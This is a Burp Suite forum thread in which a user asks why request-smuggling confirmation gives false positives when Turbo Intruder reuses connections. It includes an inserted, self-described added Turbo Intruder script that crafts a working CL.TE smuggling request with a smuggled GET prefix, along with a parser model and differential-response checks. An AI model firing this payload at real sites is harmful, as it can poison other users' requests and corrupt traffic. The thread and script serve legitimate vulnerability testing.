The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

Testing Request Smuggling with Burp Suite.

oXnoOneXo | Last updated: Nov 06, 2023 04:49PM UTC

Hello PortSwigger team, I'm really confused about a certain thing in the request smuggling vulnerability, which is sending the requests in the same connection, or testing the vulnerability with Turbo Intruder scripts using the value 1 for the requestsPerConnection variable that you also mentioned in the methodology section in this blog: https://portswigger.net/research/http-desync-attacks-what-happened-next

Whenever I test for request smuggling, I could always confirm the vulnerability by the differential response technique whenever I set the variable requestsPerConnection to more than 1; even if it's just 2 it would work, unlike setting it to 1.

Besides, I did read James's disclosed report on New Relic here: https://hackerone.com/reports/498052 Here James was using the requestsPerConnection parameter set to 5 and you managed to get the report resolved, and in another report here the researcher was using requestsPerConnection set to 50 and concurrentConnections set to 1 and the report got accepted: https://hackerone.com/reports/867952

So my question is: can you please explain to me why it would give me a false positive when I set the value of requestsPerConnection to more than 1, or why it would give a false positive in this case regardless of the value of the concurrentConnections variable? If this is the wrong place to ask such questions, can you please suggest where I should ask? Regards.
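
The script below is an added example written for this page; it is not code from the original post, from the linked HackerOne reports, or from PortSwigger's own Turbo Intruder examples. It shows the differential-response check for a suspected CL.TE desync with requestsPerConnection=1, and includes a small model of what a Transfer-Encoding-framed back-end sees on its connection, which is the mechanism behind the false positive the question asks about: when the attack request and the follow-up share one TCP connection, the bytes the back-end leaves unread simply prefix the follow-up, which is ordinary HTTP/1.1 pipelining and happens on a single server with no front-end at all. Only a follow-up that arrives on a fresh client connection and is still poisoned proves that the front-end reused a dirty back-end connection, i.e. that other users' requests are affected. `RequestEngine` and `table` are globals Turbo Intruder injects at run time; `HOST` and `PROBE_PATH` are assumed placeholders, and the `/404` probe path is the usual assumption that the back-end answers it with a 404.

```python
# Added example for this thread (not code from the original post, the linked
# HackerOne reports or PortSwigger's own Turbo Intruder examples): confirm a
# suspected CL.TE desync with the differential-response technique, one
# request per connection, and model what the TE-framed back-end sees.
# RequestEngine and table are globals that Turbo Intruder injects at run
# time; HOST and PROBE_PATH are assumed placeholders. Kept Python 2/3
# compatible because Turbo Intruder runs scripts under Jython.

HOST = 'vulnerable.example'   # assumption: host under test
PROBE_PATH = '/404'           # assumption: a path the back-end answers with 404


def build_cl_te_attack(host, probe_path):
    """Attack request for CL.TE: Content-Length covers the whole body, so a
    CL-framed front-end forwards all of it, while the chunked body ends at
    the 0-size chunk, so a TE-framed back-end leaves the prefix unread on its
    connection, where it glues onto the start of the next request."""
    prefix = 'GET %s HTTP/1.1\r\nFoo: x' % probe_path   # no trailing CRLF on purpose
    body = '0\r\n\r\n' + prefix
    return ('POST / HTTP/1.1\r\n'
            'Host: %s\r\n'
            'Content-Type: application/x-www-form-urlencoded\r\n'
            'Content-Length: %d\r\n'
            'Transfer-Encoding: chunked\r\n'
            '\r\n%s') % (host, len(body), body)


def build_normal(host):
    """Ordinary request used both as the baseline and as the follow-up."""
    return 'GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % host


def backend_view(stream):
    """Model of a back-end that honours Transfer-Encoding over Content-Length:
    return the request line of every request it carves out of one connection's
    bytes. Feed it attack + follow-up to watch the follow-up turn into the
    smuggled GET, whichever client connection the follow-up came from."""
    seen = []
    while '\r\n\r\n' in stream:
        head, stream = stream.split('\r\n\r\n', 1)
        headers = head.split('\r\n')
        seen.append(headers[0])
        lower = [h.lower() for h in headers[1:]]
        if any(h.startswith('transfer-encoding:') and 'chunked' in h for h in lower):
            while '\r\n' in stream:            # consume chunks up to the 0-size one
                size_line, stream = stream.split('\r\n', 1)
                size = int(size_line.split(';')[0].strip(), 16)
                stream = stream[size + 2:]     # chunk data plus its trailing CRLF
                if size == 0:
                    break
        else:
            lengths = [int(h.split(':', 1)[1]) for h in lower
                       if h.startswith('content-length:')]
            if lengths:
                stream = stream[lengths[0]:]
    return seen


def verdict(statuses):
    """Compare the follow-up with the baseline once both responses are in."""
    if 'baseline' not in statuses or 'follow-up' not in statuses:
        return 'pending'
    if statuses['follow-up'] != statuses['baseline']:
        return 'desync confirmed: follow-up on a fresh connection was poisoned'
    return 'not confirmed'


statuses = {}


def queueRequests(target, wordlists):
    # requestsPerConnection=1: the follow-up arrives on a fresh client
    # connection, so it can only be poisoned if the front-end routed it onto
    # the back-end connection the attack left dirty. With a value above 1 the
    # follow-up shares the attack's connection and a 404 there is ordinary
    # HTTP/1.1 pipelining, which any server does on its own.
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=1,
                           pipeline=False,
                           maxRetriesPerRequest=0)
    engine.queue(build_normal(HOST), label='baseline')
    engine.queue(build_cl_te_attack(HOST, PROBE_PATH), label='attack')
    engine.queue(build_normal(HOST), label='follow-up')


def handleResponse(req, interesting):
    statuses[req.label] = req.status
    table.add(req)
```

Paste the script into Turbo Intruder with the target selected; the three responses appear in the table and `verdict(statuses)` reports whether the follow-up's status diverged from the baseline. The `backend_view` model is there to run offline: `backend_view(build_cl_te_attack(HOST, PROBE_PATH) + build_normal(HOST))` returns the two request lines the back-end actually parses, with the follow-up replaced by the smuggled `GET /404`, which is exactly the effect that looks like a confirmed vulnerability on a shared connection but only counts when the follow-up came in on a separate one.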

Hannah, PortSwigger Agent | Last updated: Nov 07, 2023 04:45PM UTC